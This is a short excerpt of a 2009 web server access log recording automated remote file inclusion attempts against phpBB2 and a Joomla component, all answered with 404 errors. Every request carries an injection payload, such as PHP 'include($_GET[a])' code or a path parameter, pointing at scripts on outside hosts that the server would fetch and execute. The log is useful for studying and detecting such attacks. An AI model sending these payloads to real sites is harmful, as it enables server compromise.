174.36.2.15 - - [12/Sep/2009:03:57:06 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:03:57:23 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.254.195.7 - - [12/Sep/2009:03:57:33 -0400] "GET /logs/access_log.Q109090700/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
121.254.195.7 - - [12/Sep/2009:03:57:33 -0400] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
121.254.195.7 - - [12/Sep/2009:03:57:34 -0400] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
64.6.232.171 - - [12/Sep/2009:03:57:45 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.j-vintage.com/jvntg/perkosa.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
64.6.232.171 - - [12/Sep/2009:03:57:45 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.j-vintage.com/jvntg/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
64.6.232.171 - - [12/Sep/2009:03:57:45 -0400] "GET /logs/access_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.j-vintage.com/jvntg/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
